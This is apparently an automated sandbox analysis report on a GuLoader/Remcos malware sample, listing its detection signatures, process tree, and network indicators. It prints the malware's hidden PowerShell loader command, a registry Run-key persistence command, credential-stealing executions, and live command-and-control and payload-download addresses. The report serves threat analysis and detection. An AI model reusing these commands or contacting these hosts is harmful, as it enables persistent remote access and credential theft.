Joe Sandbox Cloud Basic Analysis Report

Loading Joe Sandbox Report ...

Edit tour

Windows Analysis Report
SecuriteInfo.com.Win32.InjectorX-gen.20521.11680.exe

Overview

General Information

Sample name:SecuriteInfo.com.Win32.InjectorX-gen.20521.11680.exe
Analysis ID:1522631
MD5:450228d72f9f726b645c55bbbc6db905
SHA1:b26075c51a4681f2ff7407188f5e9480545a7aca
SHA256:9124d7696d2b94e7959933c3f7a8f68e61a5ce29cd5934a4d0379c2193b126be
Tags:exe
Infos:

Detection

Remcos, GuLoader
Score:100
Range:0 - 100
Whitelisted:false
Confidence:100%

Signatures

Detected Remcos RAT
Detected unpacking (changes PE section rights)
Multi AV Scanner detection for dropped file
Multi AV Scanner detection for submitted file
Sigma detected: Remcos
Suricata IDS alerts for network traffic
Yara detected GuLoader
AI detected suspicious sample
Found suspicious powershell code related to unpacking or dynamic code loading
Loading BitLocker PowerShell Module
Maps a DLL or memory area into another process
Powershell drops PE file
Suspicious powershell command line found
Switches to a custom stack to bypass stack traces
Tries to harvest and steal browser information (history, passwords, etc)
Tries to steal Instant Messenger accounts or passwords
Tries to steal Mail credentials (via file / registry access)
Tries to steal Mail credentials (via file registry)
Writes to foreign memory regions
Yara detected WebBrowserPassView password recovery tool
Abnormal high CPU Usage
Contains functionality for read data from the clipboard
Contains functionality to call native functions
Contains functionality to check the parent process ID (often done to detect debuggers and analysis systems)
Contains functionality to dynamically determine API calls
Contains functionality to modify clipboard data
Contains functionality to shutdown / reboot the system
Contains long sleeps (>= 3 min)
Creates a process in suspended mode (likely to inject code)
Creates files inside the system directory
Detected TCP or UDP traffic on non-standard ports
Detected potential crypto function
Dropped file seen in connection with other malware
Drops PE files
Enables debug privileges
Extensive use of GetProcAddress (often used to hide API calls)
Found a high number of Window / User specific system calls (may be a loop to detect user behavior)
Found large amount of non-executed APIs
Found potential string decryption / allocating functions
HTTP GET or POST without a user agent
IP address seen in connection with other malware
Internet Provider seen in connection with other malware
May sleep (evasive loops) to hinder dynamic analysis
One or more processes crash
PE / OLE file has an invalid certificate
Queries the volume information (name, serial number etc) of a device
Sample execution stops while process was sleeping (likely an evasion)
Sigma detected: CurrentVersion Autorun Keys Modification
Sigma detected: Direct Autorun Keys Modification
Sigma detected: Potential Persistence Attempt Via Run Keys Using Reg.EXE
Suricata IDS alerts with low severity for network traffic
Uses 32bit PE files
Uses Microsoft's Enhanced Cryptographic Provider
Uses a known web browser user agent for HTTP communication
Uses code obfuscation techniques (call, push, ret)
Uses reg.exe to modify the Windows registry

Classification

Process Tree

  • System is w10x64
  • SecuriteInfo.com.Win32.InjectorX-gen.20521.11680.exe (PID: 2688 cmdline: "C:\Users\user\Desktop\SecuriteInfo.com.Win32.InjectorX-gen.20521.11680.exe" MD5: 450228D72F9F726B645C55BBBC6DB905)
    • powershell.exe (PID: 6284 cmdline: "powershell.exe" -windowstyle hidden "$krjning=Get-Content -Raw 'C:\Users\user\AppData\Roaming\intercessionate\Favourablies117\sulfonylurea\Aerognosy.Res';$Lukewarmly95=$krjning.SubString(5322,3);.$Lukewarmly95($krjning)" MD5: C32CA4ACFCC635EC1EA6ED8A34DF5FAC)
      • conhost.exe (PID: 6300 cmdline: C:\Windows\system32\conhost.exe 0xffffffff -ForceV1 MD5: 0D698AF330FD17BEE3BF90011D49251D)
      • Vaccinerende.exe (PID: 5916 cmdline: "C:\Users\user\AppData\Local\Temp\Vaccinerende.exe" MD5: 450228D72F9F726B645C55BBBC6DB905)
        • cmd.exe (PID: 2180 cmdline: "C:\Windows\System32\cmd.exe" /c REG ADD HKCU\Software\Microsoft\Windows\CurrentVersion\Run /f /v "Chivey57" /t REG_EXPAND_SZ /d "%Misbehavers% -windowstyle 1 $Frligheden=(gp -Path 'HKCU:\Software\Roscoelite\').Aftvttedes;%Misbehavers% ($Frligheden)" MD5: D0FCE3AFA6AA1D58CE9FA336CC2B675B)
          • conhost.exe (PID: 1260 cmdline: C:\Windows\system32\conhost.exe 0xffffffff -ForceV1 MD5: 0D698AF330FD17BEE3BF90011D49251D)
          • reg.exe (PID: 5624 cmdline: REG ADD HKCU\Software\Microsoft\Windows\CurrentVersion\Run /f /v "Chivey57" /t REG_EXPAND_SZ /d "%Misbehavers% -windowstyle 1 $Frligheden=(gp -Path 'HKCU:\Software\Roscoelite\').Aftvttedes;%Misbehavers% ($Frligheden)" MD5: CDD462E86EC0F20DE2A1D781928B1B0C)
        • Vaccinerende.exe (PID: 6044 cmdline: C:\Users\user\AppData\Local\Temp\Vaccinerende.exe /stext "C:\Users\user\AppData\Local\Temp\lkcwddclh" MD5: 450228D72F9F726B645C55BBBC6DB905)
        • Vaccinerende.exe (PID: 3192 cmdline: C:\Users\user\AppData\Local\Temp\Vaccinerende.exe /stext "C:\Users\user\AppData\Local\Temp\omhpewnevqbu" MD5: 450228D72F9F726B645C55BBBC6DB905)
        • Vaccinerende.exe (PID: 5996 cmdline: C:\Users\user\AppData\Local\Temp\Vaccinerende.exe /stext "C:\Users\user\AppData\Local\Temp\yguhfoygjytgatk" MD5: 450228D72F9F726B645C55BBBC6DB905)
        • Vaccinerende.exe (PID: 2140 cmdline: C:\Users\user\AppData\Local\Temp\Vaccinerende.exe /stext "C:\Users\user\AppData\Local\Temp\dpvrcfd" MD5: 450228D72F9F726B645C55BBBC6DB905)
        • Vaccinerende.exe (PID: 1344 cmdline: C:\Users\user\AppData\Local\Temp\Vaccinerende.exe /stext "C:\Users\user\AppData\Local\Temp\fsbcdyonhlh" MD5: 450228D72F9F726B645C55BBBC6DB905)
        • Vaccinerende.exe (PID: 5940 cmdline: C:\Users\user\AppData\Local\Temp\Vaccinerende.exe /stext "C:\Users\user\AppData\Local\Temp\qmgvdqygubzojv" MD5: 450228D72F9F726B645C55BBBC6DB905)
        • WerFault.exe (PID: 7068 cmdline: C:\Windows\SysWOW64\WerFault.exe -u -p 5916 -s 892 MD5: C31336C1EFC2CCB44B4326EA793040F2)
  • cleanup

Malware Threat Intel

Provided by

NameDescriptionAttributionBlogpost URLsLink
Remcos, RemcosRATRemcos (acronym of Remote Control & Surveillance Software) is a commercial Remote Access Tool to remotely control computers.Remcos is advertised as legitimate software which can be used for surveillance and penetration testing purposes, but has been used in numerous hacking campaigns.Remcos, once installed, opens a backdoor on the computer, granting full access to the remote user.Remcos is developed by the cybersecurity company BreakingSecurity.
  • APT33
  • The Gorgon Group
  • UAC-0050
https://malpedia.caad.fkie.fraunhofer.de/details/win.remcos
NameDescriptionAttributionBlogpost URLsLink
CloudEyE, GuLoaderCloudEyE (initially named GuLoader) is a small VB5/6 downloader. It typically downloads RATs/Stealers, such as Agent Tesla, Arkei/Vidar, Formbook, Lokibot, Netwire and Remcos, often but not always from Google Drive. The downloaded payload is xored.No Attributionhttps://malpedia.caad.fkie.fraunhofer.de/details/win.cloudeye

Malware Configuration

No configs have been found

Yara Signatures

Memory Dumps

SourceRuleDescriptionAuthorStrings
00000001.00000002.3360987921.000000000C608000.00000040.00001000.00020000.00000000.sdmpJoeSecurity_GuLoader_2Yara detected GuLoaderJoe Security
    Process Memory Space: Vaccinerende.exe PID: 6044JoeSecurity_WebBrowserPassViewYara detected WebBrowserPassView password recovery toolJoe Security
      Process Memory Space: Vaccinerende.exe PID: 2140JoeSecurity_WebBrowserPassViewYara detected WebBrowserPassView password recovery toolJoe Security

        Sigma Signatures

        System Summary

        barindex
        Sigma detected: CurrentVersion Autorun Keys Modification
        Source: Registry Key setAuthor: Victor Sergeev, Daniil Yugoslavskiy, Gleb Sukhodolskiy, Timur Zinniatullin, oscd.community, Tim Shelton, frack113 (split): Data: Details: %Misbehavers% -windowstyle 1 $Frligheden=(gp -Path 'HKCU:\Software\Roscoelite\').Aftvttedes;%Misbehavers% ($Frligheden), EventID: 13, EventType: SetValue, Image: C:\Windows\SysWOW64\reg.exe, ProcessId: 5624, TargetObject: HKEY_CURRENT_USER\SOFTWARE\Microsoft\Windows\CurrentVersion\Run\Chivey57
        Sigma detected: Direct Autorun Keys Modification
        Source: Process startedAuthor: Victor Sergeev, Daniil Yugoslavskiy, oscd.community: Data: Command: REG ADD HKCU\Software\Microsoft\Windows\CurrentVersion\Run /f /v "Chivey57" /t REG_EXPAND_SZ /d "%Misbehavers% -windowstyle 1 $Frligheden=(gp -Path 'HKCU:\Software\Roscoelite\').Aftvttedes;%Misbehavers% ($Frligheden)", CommandLine: REG ADD HKCU\Software\Microsoft\Windows\CurrentVersion\Run /f /v "Chivey57" /t REG_EXPAND_SZ /d "%Misbehavers% -windowstyle 1 $Frligheden=(gp -Path 'HKCU:\Software\Roscoelite\').Aftvttedes;%Misbehavers% ($Frligheden)", CommandLine|base64offset|contains: DA, Image: C:\Windows\SysWOW64\reg.exe, NewProcessName: C:\Windows\SysWOW64\reg.exe, OriginalFileName: C:\Windows\SysWOW64\reg.exe, ParentCommandLine: "C:\Windows\System32\cmd.exe" /c REG ADD HKCU\Software\Microsoft\Windows\CurrentVersion\Run /f /v "Chivey57" /t REG_EXPAND_SZ /d "%Misbehavers% -windowstyle 1 $Frligheden=(gp -Path 'HKCU:\Software\Roscoelite\').Aftvttedes;%Misbehavers% ($Frligheden)", ParentImage: C:\Windows\SysWOW64\cmd.exe, ParentProcessId: 2180, ParentProcessName: cmd.exe, ProcessCommandLine: REG ADD HKCU\Software\Microsoft\Windows\CurrentVersion\Run /f /v "Chivey57" /t REG_EXPAND_SZ /d "%Misbehavers% -windowstyle 1 $Frligheden=(gp -Path 'HKCU:\Software\Roscoelite\').Aftvttedes;%Misbehavers% ($Frligheden)", ProcessId: 5624, ProcessName: reg.exe
        Sigma detected: Potential Persistence Attempt Via Run Keys Using Reg.EXE
        Source: Process startedAuthor: Florian Roth (Nextron Systems): Data: Command: "C:\Windows\System32\cmd.exe" /c REG ADD HKCU\Software\Microsoft\Windows\CurrentVersion\Run /f /v "Chivey57" /t REG_EXPAND_SZ /d "%Misbehavers% -windowstyle 1 $Frligheden=(gp -Path 'HKCU:\Software\Roscoelite\').Aftvttedes;%Misbehavers% ($Frligheden)", CommandLine: "C:\Windows\System32\cmd.exe" /c REG ADD HKCU\Software\Microsoft\Windows\CurrentVersion\Run /f /v "Chivey57" /t REG_EXPAND_SZ /d "%Misbehavers% -windowstyle 1 $Frligheden=(gp -Path 'HKCU:\Software\Roscoelite\').Aftvttedes;%Misbehavers% ($Frligheden)", CommandLine|base64offset|contains: , Image: C:\Windows\SysWOW64\cmd.exe, NewProcessName: C:\Windows\SysWOW64\cmd.exe, OriginalFileName: C:\Windows\SysWOW64\cmd.exe, ParentCommandLine: "C:\Users\user\AppData\Local\Temp\Vaccinerende.exe", ParentImage: C:\Users\user\AppData\Local\Temp\Vaccinerende.exe, ParentProcessId: 5916, ParentProcessName: Vaccinerende.exe, ProcessCommandLine: "C:\Windows\System32\cmd.exe" /c REG ADD HKCU\Software\Microsoft\Windows\CurrentVersion\Run /f /v "Chivey57" /t REG_EXPAND_SZ /d "%Misbehavers% -windowstyle 1 $Frligheden=(gp -Path 'HKCU:\Software\Roscoelite\').Aftvttedes;%Misbehavers% ($Frligheden)", ProcessId: 2180, ProcessName: cmd.exe
        Sigma detected: Non Interactive PowerShell Process Spawned
        Source: Process startedAuthor: Roberto Rodriguez @Cyb3rWard0g (rule), oscd.community (improvements): Data: Command: "powershell.exe" -windowstyle hidden "$krjning=Get-Content -Raw 'C:\Users\user\AppData\Roaming\intercessionate\Favourablies117\sulfonylurea\Aerognosy.Res';$Lukewarmly95=$krjning.SubString(5322,3);.$Lukewarmly95($krjning)", CommandLine: "powershell.exe" -windowstyle hidden "$krjning=Get-Content -Raw 'C:\Users\user\AppData\Roaming\intercessionate\Favourablies117\sulfonylurea\Aerognosy.Res';$Lukewarmly95=$krjning.SubString(5322,3);.$Lukewarmly95($krjning)", CommandLine|base64offset|contains: v,)^, Image: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe, NewProcessName: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe, OriginalFileName: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe, ParentCommandLine: "C:\Users\user\Desktop\SecuriteInfo.com.Win32.InjectorX-gen.20521.11680.exe", ParentImage: C:\Users\user\Desktop\SecuriteInfo.com.Win32.InjectorX-gen.20521.11680.exe, ParentProcessId: 2688, ParentProcessName: SecuriteInfo.com.Win32.InjectorX-gen.20521.11680.exe, ProcessCommandLine: "powershell.exe" -windowstyle hidden "$krjning=Get-Content -Raw 'C:\Users\user\AppData\Roaming\intercessionate\Favourablies117\sulfonylurea\Aerognosy.Res';$Lukewarmly95=$krjning.SubString(5322,3);.$Lukewarmly95($krjning)", ProcessId: 6284, ProcessName: powershell.exe

        Stealing of Sensitive Information

        barindex
        Sigma detected: Remcos
        Source: Registry Key setAuthor: Joe Security: Data: Details: 00 21 BC BC 23 53 AA E8 94 9B E0 2A 08 D0 4B 56 C2 2F 8B 12 99 DA 07 CC 62 71 73 68 10 B5 BD 45 F4 15 E9 3D C8 20 16 66 6D 76 69 D1 DF 18 78 66 41 03 C0 AD 59 C2 23 8D A4 8B 34 7D 13 60 30 49 C4 1E C3 B2 19 6C E9 38 BA 4F 64 98 B2 7C A7 6C 16 CE E8 31 FA 4D 83 7C 50 F5 F3 3C E6 78 FA 25 98 10 1F 93 04 C3 , EventID: 13, EventType: SetValue, Image: C:\Users\user\AppData\Local\Temp\Vaccinerende.exe, ProcessId: 5916, TargetObject: HKEY_CURRENT_USER\SOFTWARE\Rmc-DSGECX\exepath

        Suricata Signatures

        TimestampSIDSeverityClasstypeSource IPSource PortDestination IPDestination PortProtocol
        2024-09-30T13:59:47.052624+020020365941Malware Command and Control Activity Detected192.168.2.449738107.173.4.162404TCP
        2024-09-30T13:59:48.146382+020020365941Malware Command and Control Activity Detected192.168.2.449739107.173.4.162404TCP
        2024-09-30T13:59:55.947608+020020365941Malware Command and Control Activity Detected192.168.2.449741107.173.4.162404TCP
        2024-09-30T13:59:55.958911+020020365941Malware Command and Control Activity Detected192.168.2.449742107.173.4.162404TCP
        TimestampSIDSeverityClasstypeSource IPSource PortDestination IPDestination PortProtocol
        2024-09-30T13:59:48.254608+020028033043Unknown Traffic192.168.2.449740178.237.33.5080TCP
        TimestampSIDSeverityClasstypeSource IPSource PortDestination IPDestination PortProtocol
        2024-09-30T13:59:43.556757+020028032702Potentially Bad Traffic192.168.2.449737192.3.220.2280TCP

        Joe Sandbox Signatures

        Click to jump to signature section

        Show All Signature Results

        AV Detection

        barindex
        Multi AV Scanner detection for dropped file
        Source: C:\Users\user\AppData\Local\Temp\Vaccinerende.exeReversingLabs: Detection: 23%
        Source: C:\Users\user\AppData\Local\Temp\Vaccinerende.exeVirustotal: Detection: 32%Perma Link
        Multi AV Scanner detection for submitted file
        Source: SecuriteInfo.com.Win32.InjectorX-gen.20521.11680.exeReversingLabs: Detection: 23%
        Source: SecuriteInfo.com.Win32.InjectorX-gen.20521.11680.exeVirustotal: Detection: 32%Perma Link
        AI detected suspicious sample
        Source: Submited SampleIntegrated Neural Analysis Model: Matched 100.0% probability
        Source: C:\Users\user\AppData\Local\Temp\Vaccinerende.exeCode function: 12_2_00404423 GetProcAddress,FreeLibrary,CryptUnprotectData,12_2_00404423
        Source: SecuriteInfo.com.Win32.InjectorX-gen.20521.11680.exeStatic PE information: RELOCS_STRIPPED, EXECUTABLE_IMAGE, LINE_NUMS_STRIPPED, LOCAL_SYMS_STRIPPED, 32BIT_MACHINE
        Source: SecuriteInfo.com.Win32.InjectorX-gen.20521.11680.exeStatic PE information: DYNAMIC_BASE, NX_COMPAT, NO_SEH, TERMINAL_SERVER_AWARE
        Source: Binary string: \??\C:\Windows\Microsoft.Net\assembly\GAC_MSIL\System.Core\v4.0_4.0.0.0__b77a5c561934e089\System.Core.pdb source: powershell.exe, 00000001.00000002.3356692851.00000000071CC000.00000004.00000020.00020000.00000000.sdmp
        Source: C:\Users\user\Desktop\SecuriteInfo.com.Win32.InjectorX-gen.20521.11680.exeCode function: 0_2_0040595A GetTempPathW,DeleteFileW,lstrcatW,lstrcatW,lstrlenW,FindFirstFileW,FindNextFileW,FindClose,0_2_0040595A
        Source: C:\Users\user\Desktop\SecuriteInfo.com.Win32.InjectorX-gen.20521.11680.exeCode function: 0_2_00402862 FindFirstFileW,0_2_00402862
        Source: C:\Users\user\Desktop\SecuriteInfo.com.Win32.InjectorX-gen.20521.11680.exeCode function: 0_2_0040658F FindFirstFileW,FindClose,0_2_0040658F
        Source: C:\Users\user\AppData\Local\Temp\Vaccinerende.exeCode function: 12_2_0040AE51 FindFirstFileW,FindNextFileW,12_2_0040AE51
        Source: C:\Users\user\AppData\Local\Temp\Vaccinerende.exeCode function: 13_2_00407EF8 FindFirstFileA,FindNextFileA,strlen,strlen,13_2_00407EF8
        Source: C:\Users\user\AppData\Local\Temp\Vaccinerende.exeCode function: 14_2_00407898 FindFirstFileA,FindNextFileA,strlen,strlen,14_2_00407898
        Source: C:\Users\user\AppData\Local\Temp\Vaccinerende.exeCode function: 17_2_00407898 FindFirstFileA,FindNextFileA,strlen,strlen,17_2_00407898
        Source: C:\Windows\SysWOW64\cmd.exeFile opened: C:\Users\user\AppData\Roaming\intercessionate\Jump to behavior
        Source: C:\Windows\SysWOW64\cmd.exeFile opened: C:\Users\user\AppData\Roaming\intercessionate\Favourablies117\sulfonylurea\Jump to behavior
        Source: C:\Windows\SysWOW64\cmd.exeFile opened: C:\Users\user\AppData\Roaming\intercessionate\Favourablies117\Jump to behavior
        Source: C:\Windows\SysWOW64\cmd.exeFile opened: C:\Users\user\AppData\Jump to behavior
        Source: C:\Windows\SysWOW64\cmd.exeFile opened: C:\Users\user\AppData\Roaming\Jump to behavior
        Source: C:\Windows\SysWOW64\cmd.exeFile opened: C:\Users\user\Jump to behavior

        Networking

        barindex
        Suricata IDS alerts for network traffic
        Source: Network trafficSuricata IDS: 2036594 - Severity 1 - ET JA3 Hash - Remcos 3.x/4.x TLS Connection : 192.168.2.4:49739 -> 107.173.4.16:2404
        Source: Network trafficSuricata IDS: 2036594 - Severity 1 - ET JA3 Hash - Remcos 3.x/4.x TLS Connection : 192.168.2.4:49738 -> 107.173.4.16:2404
        Source: Network trafficSuricata IDS: 2036594 - Severity 1 - ET JA3 Hash - Remcos 3.x/4.x TLS Connection : 192.168.2.4:49741 -> 107.173.4.16:2404
        Source: Network trafficSuricata IDS: 2036594 - Severity 1 - ET JA3 Hash - Remcos 3.x/4.x TLS Connection : 192.168.2.4:49742 -> 107.173.4.16:2404
        Source: global trafficTCP traffic: 192.168.2.4:49738 -> 107.173.4.16:2404
        Source: global trafficHTTP traffic detected: GET /json.gp HTTP/1.1Host: geoplugin.netCache-Control: no-cache
        Source: Joe Sandbox ViewIP Address: 107.173.4.16 107.173.4.16
        Source: Joe Sandbox ViewIP Address: 178.237.33.50 178.237.33.50
        Source: Joe Sandbox ViewASN Name: AS-COLOCROSSINGUS AS-COLOCROSSINGUS
        Source: Network trafficSuricata IDS: 2803304 - Severity 3 - ETPRO MALWARE Common Downloader Header Pattern HCa : 192.168.2.4:49740 -> 178.237.33.50:80
        Source: Network trafficSuricata IDS: 2803270 - Severity 2 - ETPRO MALWARE Common Downloader Header Pattern UHCa : 192.168.2.4:49737 -> 192.3.220.22:80
        Source: global trafficHTTP traffic detected: GET /hFXELFSwRHRwqbE214.bin HTTP/1.1User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64; rv:121.0) Gecko/20100101 Firefox/121.0Host: 192.3.220.22Cache-Control: no-cache
        Source: unknownTCP traffic detected without corresponding DNS query: 192.3.220.22
        Source: unknownTCP traffic detected without corresponding DNS query: 192.3.220.22
        Source: unknownTCP traffic detected without corresponding DNS query: 192.3.220.22
        Source: unknownTCP traffic detected without corresponding DNS query: 192.3.220.22
        Source: unknownTCP traffic detected without corresponding DNS query: 192.3.220.22
        Source: unknownTCP traffic detected without corresponding DNS query: 192.3.220.22
        Source: unknownTCP traffic detected without corresponding DNS query: 192.3.220.22
        Source: unknownTCP traffic detected without corresponding DNS query: 192.3.220.22
        Source: unknownTCP traffic detected without corresponding DNS query: 192.3.220.22
        Source: unknownTCP traffic detected without corresponding DNS query: 192.3.220.22
        Source: unknownTCP traffic detected without corresponding DNS query: 192.3.220.22
        Source: unknownTCP traffic detected without corresponding DNS query: 192.3.220.22
        Source: unknownTCP traffic detected without corresponding DNS query: 192.3.220.22
        Source: unknownTCP traffic detected without corresponding DNS query: 192.3.220.22
        Source: unknownTCP traffic detected without corresponding DNS query: 192.3.220.22
        Source: unknownTCP traffic detected without corresponding DNS query: 192.3.220.22
        Source: unknownTCP traffic detected without corresponding DNS query: 192.3.220.22
        Source: unknownTCP traffic detected without corresponding DNS query: 192.3.220.22
        Source: unknownTCP traffic detected without corresponding DNS query: 192.3.220.22
        Source: unknownTCP traffic detected without corresponding DNS query: 192.3.220.22
        Source: unknownTCP traffic detected without corresponding DNS query: 192.3.220.22
        Source: unknownTCP traffic detected without corresponding DNS query: 192.3.220.22
        Source: unknownTCP traffic detected without corresponding DNS query: 192.3.220.22
        Source: unknownTCP traffic detected without corresponding DNS query: 192.3.220.22
        Source: unknownTCP traffic detected without corresponding DNS query: 192.3.220.22
        Source: unknownTCP traffic detected without corresponding DNS query: 192.3.220.22
        Source: unknownTCP traffic detected without corresponding DNS query: 192.3.220.22
        Source: unknownTCP traffic detected without corresponding DNS query: 192.3.220.22
        Source: unknownTCP traffic detected without corresponding DNS query: 192.3.220.22
        Source: unknownTCP traffic detected without corresponding DNS query: 192.3.220.22
        Source: unknownTCP traffic detected without corresponding DNS query: 192.3.220.22
        Source: unknownTCP traffic detected without corresponding DNS query: 192.3.220.22
        Source: unknownTCP traffic detected without corresponding DNS query: 192.3.220.22
        Source: unknownTCP traffic detected without corresponding DNS query: 192.3.220.22
        Source: unknownTCP traffic detected without corresponding DNS query: 192.3.220.22
        Source: unknownTCP traffic detected without corresponding DNS query: 192.3.220.22
        Source: unknownTCP traffic detected without corresponding DNS query: 192.3.220.22
        Source: unknownTCP traffic detected without corresponding DNS query: 192.3.220.22
        Source: unknownTCP traffic detected without corresponding DNS query: 192.3.220.22
        Source: unknownTCP traffic detected without corresponding DNS query: 192.3.220.22
        Source: unknownTCP traffic detected without corresponding DNS query: 192.3.220.22
        Source: unknownTCP traffic detected without corresponding DNS query: 192.3.220.22
        Source: unknownTCP traffic detected without corresponding DNS query: 192.3.220.22
        Source: unknownTCP traffic detected without corresponding DNS query: 192.3.220.22
        Source: unknownTCP traffic detected without corresponding DNS query: 192.3.220.22
        Source: unknownTCP traffic detected without corresponding DNS query: 192.3.220.22
        Source: unknownTCP traffic detected without corresponding DNS query: 192.3.220.22
        Source: unknownTCP traffic detected without corresponding DNS query: 192.3.220.22
        Source: unknownTCP traffic detected without corresponding DNS query: 192.3.220.22
        Source: unknownTCP traffic detected without corresponding DNS query: 192.3.220.22
        Source: global trafficHTTP traffic detected: GET /hFXELFSwRHRwqbE214.bin HTTP/1.1User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64; rv:121.0) Gecko/20100101 Firefox/121.0Host: 192.3.220.22Cache-Control: no-cache
        Source: global trafficHTTP traffic detected: GET /json.gp HTTP/1.1Host: geoplugin.netCache-Control: no-cache
        Source: Vaccinerende.exe, 0000000C.00000002.3452842221.000000000090A000.00000004.00000020.00020000.00000000.sdmp, Vaccinerende.exe, 0000000F.00000002.3455492305.000000000058A000.00000004.00000020.00020000.00000000.sdmpString found in binary or memory: 92.168.2.1/all/ProfessionalRetail.imgfile://192.168.2.1/all/Professional2019Retail.imghttps://www.google.com/accounts/serviceloginhttp://www.facebook.com/https://login.yahoo.com/config/login equals www.facebook.com (Facebook)
        Source: Vaccinerende.exe, 0000000C.00000002.3452842221.000000000090A000.00000004.00000020.00020000.00000000.sdmp, Vaccinerende.exe, 0000000F.00000002.3455492305.000000000058A000.00000004.00000020.00020000.00000000.sdmpString found in binary or memory: 92.168.2.1/all/ProfessionalRetail.imgfile://192.168.2.1/all/Professional2019Retail.imghttps://www.google.com/accounts/serviceloginhttp://www.facebook.com/https://login.yahoo.com/config/login equals www.yahoo.com (Yahoo)
        Source: Vaccinerende.exe, 0000000E.00000002.3385658786.0000000000400000.00000040.80000000.00040000.00000000.sdmp, Vaccinerende.exe, 00000011.00000002.3441886712.0000000000400000.00000040.80000000.00040000.00000000.sdmpString found in binary or memory: Software\America Online\AOL Instant Messenger (TM)\CurrentVersion\Users%s\Loginprpl-msnprpl-yahooprpl-jabberprpl-novellprpl-oscarprpl-ggprpl-ircaccounts.xmlaimaim_1icqicq_1jabberjabber_1msnmsn_1yahoogggg_1http://www.imvu.comhttp://www.ebuddy.comhttps://www.google.com equals www.ebuddy.com (eBuggy)
        Source: Vaccinerende.exe, 0000000F.00000003.3454739598.0000000000589000.00000004.00000020.00020000.00000000.sdmpString found in binary or memory: Xs://login.live.com/oauth20_logout.srf?client_id=00000000480728C5&redirect_uri=https://login.live.com/oauth20_desktop.srfhttps://login.live.com/oauth20_logout.srfhttps://login.live.com/oauth20_authorize.srf?client_id=00000000480728C5&scope=service::ssl.live.com::MBI_SSL&response_type=token&display=windesktop&theme=win7&lc=2057&redirect_uri=https://login.live.com/oauth20_desktop.srf&lw=1&fl=wld2https://login.live.com/oauth20_authorize.srfhttps://login.live.com/oauth20_desktop.srf?lc=1033https://login.live.com/oauth20_desktop.srffile:///C:/Windows/system32/oobe/FirstLogonAnim.htmlfile://192.168.2.1/all/install/setup.au3file://192.168.2.1/all/ProfessionalRetail.imgfile://192.168.2.1/all/Professional2019Retail.imghttps://www.google.com/accounts/serviceloginhttp://www.facebook.com/https://login.yahoo.com/config/login equals www.facebook.com (Facebook)
        Source: Vaccinerende.exe, 0000000F.00000003.3454739598.0000000000589000.00000004.00000020.00020000.00000000.sdmpString found in binary or memory: Xs://login.live.com/oauth20_logout.srf?client_id=00000000480728C5&redirect_uri=https://login.live.com/oauth20_desktop.srfhttps://login.live.com/oauth20_logout.srfhttps://login.live.com/oauth20_authorize.srf?client_id=00000000480728C5&scope=service::ssl.live.com::MBI_SSL&response_type=token&display=windesktop&theme=win7&lc=2057&redirect_uri=https://login.live.com/oauth20_desktop.srf&lw=1&fl=wld2https://login.live.com/oauth20_authorize.srfhttps://login.live.com/oauth20_desktop.srf?lc=1033https://login.live.com/oauth20_desktop.srffile:///C:/Windows/system32/oobe/FirstLogonAnim.htmlfile://192.168.2.1/all/install/setup.au3file://192.168.2.1/all/ProfessionalRetail.imgfile://192.168.2.1/all/Professional2019Retail.imghttps://www.google.com/accounts/serviceloginhttp://www.facebook.com/https://login.yahoo.com/config/login equals www.yahoo.com (Yahoo)
        Source: Vaccinerende.exe, Vaccinerende.exe, 00000011.00000002.3441886712.0000000000400000.00000040.80000000.00040000.00000000.sdmpString found in binary or memory: http://www.ebuddy.com equals www.ebuddy.com (eBuggy)
        Source: Vaccinerende.exeString found in binary or memory: http://www.facebook.com/ equals www.facebook.com (Facebook)
        Source: Vaccinerende.exe, 0000000C.00000003.3451895239.0000000000909000.00000004.00000020.00020000.00000000.sdmpString found in binary or memory: s://login.live.com/oauth20_logout.srf?client_id=00000000480728C5&redirect_uri=https://login.live.com/oauth20_desktop.srfhttps://login.live.com/oauth20_logout.srfhttps://login.live.com/oauth20_authorize.srf?client_id=00000000480728C5&scope=service::ssl.live.com::MBI_SSL&response_type=token&display=windesktop&theme=win7&lc=2057&redirect_uri=https://login.live.com/oauth20_desktop.srf&lw=1&fl=wld2https://login.live.com/oauth20_authorize.srfhttps://login.live.com/oauth20_desktop.srf?lc=1033https://login.live.com/oauth20_desktop.srffile:///C:/Windows/system32/oobe/FirstLogonAnim.htmlfile://192.168.2.1/all/install/setup.au3file://192.168.2.1/all/ProfessionalRetail.imgfile://192.168.2.1/all/Professional2019Retail.imghttps://www.google.com/accounts/serviceloginhttp://www.facebook.com/https://login.yahoo.com/config/login equals www.facebook.com (Facebook)
        Source: Vaccinerende.exe, 0000000C.00000003.3451895239.0000000000909000.00000004.00000020.00020000.00000000.sdmpString found in binary or memory: s://login.live.com/oauth20_logout.srf?client_id=00000000480728C5&redirect_uri=https://login.live.com/oauth20_desktop.srfhttps://login.live.com/oauth20_logout.srfhttps://login.live.com/oauth20_authorize.srf?client_id=00000000480728C5&scope=service::ssl.live.com::MBI_SSL&response_type=token&display=windesktop&theme=win7&lc=2057&redirect_uri=https://login.live.com/oauth20_desktop.srf&lw=1&fl=wld2https://login.live.com/oauth20_authorize.srfhttps://login.live.com/oauth20_desktop.srf?lc=1033https://login.live.com/oauth20_desktop.srffile:///C:/Windows/system32/oobe/FirstLogonAnim.htmlfile://192.168.2.1/all/install/setup.au3file://192.168.2.1/all/ProfessionalRetail.imgfile://192.168.2.1/all/Professional2019Retail.imghttps://www.google.com/accounts/serviceloginhttp://www.facebook.com/https://login.yahoo.com/config/login equals www.yahoo.com (Yahoo)
        Source: Vaccinerende.exe, 0000000C.00000002.3452219182.0000000000400000.00000040.80000000.00040000.00000000.sdmp, Vaccinerende.exe, 0000000F.00000002.3455198699.0000000000400000.00000040.80000000.00040000.00000000.sdmpString found in binary or memory: ~@:9@0123456789ABCDEFURL index.datvisited:https://www.google.com/accounts/serviceloginhttp://www.facebook.com/https://login.yahoo.com/config/login$ equals www.facebook.com (Facebook)
